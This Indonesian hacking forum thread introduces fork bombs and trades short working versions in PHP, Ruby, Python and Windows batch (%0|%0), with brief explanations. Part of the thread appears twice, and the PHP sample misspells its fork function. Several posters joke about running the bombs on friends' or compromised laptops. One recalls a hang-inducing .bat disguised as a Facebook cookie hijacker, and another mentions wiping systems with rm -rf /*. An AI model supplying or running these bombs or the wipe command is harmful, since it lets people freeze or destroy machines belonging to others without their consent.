Mengenal Fork bomb - Self Destruct
mantap,menarik diuntuk dicoba .. dicoba dilaptop orang Big Grin
Jangan Makan Tulang Kawan | Kurawa |

(01-04-2013, 10:15 PM)DoctoroL Wrote: mantap,menarik diuntuk dicoba .. dicoba dilaptop orang Big Grin

hehe kl udah owned trus jalanin prnth d ats.

oke kaka ... tp ane belom berani coba dilaptop sendiri nih, nunggu laptop orang dulu . wkwkwk *devilThinking Big Grin
Jangan Makan Tulang Kawan | Kurawa |

ane pernah kena nih yang kaya gini Big Grin
sampe nge hang kompi ane Big Grin

scriptnya cuma "start" sebanyak 700000 Big Grin
nama file nya "hijack cokie facebook.bat" Big Grin

nice om, sepertinya saya harus banyak belajar ni bahasa gituan =))
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

(12-30-2012, 11:23 PM)alkaaf Wrote:
(12-30-2012, 10:48 PM)Malsasa Wrote: Ooh, gini ya haking? Menarik sekali analisis akang mempreteli kode aneh itu. Saya tak menyadari itu fungsi. Padahal sudah ada {}. Tak saya sangka nama fungsi bisa dibuat hanya dengan :.

Terima kasih.

yup ane juga baru tau kalo di bash, : pun bisa jadi nama fungsi. Big Grin

(12-30-2012, 11:16 PM)zee eichel Wrote: banyak malware memiliki fungsi seperti ini ... thx udah share ya +2

yup... bener bro... rata rata penyebaran worm menggunakan fungsi rekrusif kaya di atas buat jelajah folder folder

tambahan nih... fork bomb dari php
php
[shcode=php]
<?php
while(1){
pnctl_fork();
}
?>
[/shcode]

pnctl_fork() merupakan sebuah fungsi untuk melakukkan forking proses php yang sedang berjalan. apabila terdapat loop while(1) maka akan forking terus menerus tanpa henti sampe pid nya habis. satu lagi, perintah ini hanya dapat dieksekusi lewat php-cli dan khusus linux.

ruby

Code:
def bomb           # deklarasi fungsi bomb
     loop { fork { bomb}} # perulangan selamanya untuk forking fungsi bomb
end;                   # akhir fungsi
bomb                 # panggil fungsi bomb

[b]python[/p]
[shcode=python]
import os
while True:
os.fork()
[/shcode]

tambahan lagi neh buat batch windows.

buka notepad kasi nama terserah dengan extensi bat.

Code:
%0|%0

ketikkan kode di atas dan jalankan program bat nya.

penjelasan: teknik ini harus menggunakan sebuah file bat dan tidak boleh dieksekusi secara langsung.sebenernya apa makna dari %0?

%0 merupakan sebuah variabel dalam bat yang berisi alamat dan nama script yang di jalankan. misal script bernama bomb.bat terletak di C:\ maka nilai variabel %0 adalah C:\bomb.bat.

jadi apabila %0|%0 maka menurut permisalan di atas jadi
Code:
C:\bomb.bat | C:\bomb.bat

command prompt akan terus mengeksekusi bomb.bat karena output dari bomb.bat akan dipipeline ke bomb.bat yang mana harus mengeksekusi bomb.bat juga.

Buset ngumpul lagi nih fork2 keren, ini ibaratnya membunuh secara perlahan. tapi ane biasanya make rm -rf /* jadi nggak nyiksa Big Grin. keep share mas bro ?
Quote:~ Tan Hana Wighna Tan Sirna ~

ohh, ia ane paham sekarang setelah baca penjelasannya di reply. jadi pengen coba. tapi gak berani di komputer sendiri. pake komputer temen takut di marahin Big Grin
Information Is The Most Dangerous Weapon In The World

tambah ilmu buat attacking nih Smile)
Follow me @hanifrifaii

(12-30-2012, 11:23 PM)alkaaf Wrote:
(12-30-2012, 10:48 PM)Malsasa Wrote: Ooh, gini ya haking? Menarik sekali analisis akang mempreteli kode aneh itu. Saya tak menyadari itu fungsi. Padahal sudah ada {}. Tak saya sangka nama fungsi bisa dibuat hanya dengan :.

Terima kasih.

yup ane juga baru tau kalo di bash, : pun bisa jadi nama fungsi. Big Grin

(12-30-2012, 11:16 PM)zee eichel Wrote: banyak malware memiliki fungsi seperti ini ... thx udah share ya +2

yup... bener bro... rata rata penyebaran worm menggunakan fungsi rekrusif kaya di atas buat jelajah folder folder

tambahan nih... fork bomb dari php
php
[shcode=php]
<?php
while(1){
pnctl_fork();
}
?>
[/shcode]

pnctl_fork() merupakan sebuah fungsi untuk melakukkan forking proses php yang sedang berjalan. apabila terdapat loop while(1) maka akan forking terus menerus tanpa henti sampe pid nya habis. satu lagi, perintah ini hanya dapat dieksekusi lewat php-cli dan khusus linux.

ruby

Code:
def bomb           # deklarasi fungsi bomb
     loop { fork { bomb}} # perulangan selamanya untuk forking fungsi bomb
end;                   # akhir fungsi
bomb                 # panggil fungsi bomb

[b]python[/p]
[shcode=python]
import os
while True:
os.fork()
[/shcode]

tambahan lagi neh buat batch windows.

buka notepad kasi nama terserah dengan extensi bat.

Code:
%0|%0

ketikkan kode di atas dan jalankan program bat nya.

penjelasan: teknik ini harus menggunakan sebuah file bat dan tidak boleh dieksekusi secara langsung.sebenernya apa makna dari %0?

%0 merupakan sebuah variabel dalam bat yang berisi alamat dan nama script yang di jalankan. misal script bernama bomb.bat terletak di C:\ maka nilai variabel %0 adalah C:\bomb.bat.

jadi apabila %0|%0 maka menurut permisalan di atas jadi
Code:
C:\bomb.bat | C:\bomb.bat

command prompt akan terus mengeksekusi bomb.bat karena output dari bomb.bat akan dipipeline ke bomb.bat yang mana harus mengeksekusi bomb.bat juga.

wah, komputer ane langsung hang pas nyobain
Code:
%0|%0

[Image: forkbomb_zps19ef945c.png]

mang hebat ini script bomb..wkk. sampe ga sempet ngekill ni script di taskmanager..=))

(05-18-2013, 09:37 AM)kyoshiro67 Wrote: wah, komputer ane langsung hang pas nyobain
Code:
%0|%0

mang hebat ini script bomb..wkk. sampe ga sempet ngekill ni script di taskmanager..=))

hehe.. pake virtual box aja lah ngga masalah nge-hang. Big Grin. g mungkin bisa di kill tu proses, Big Grin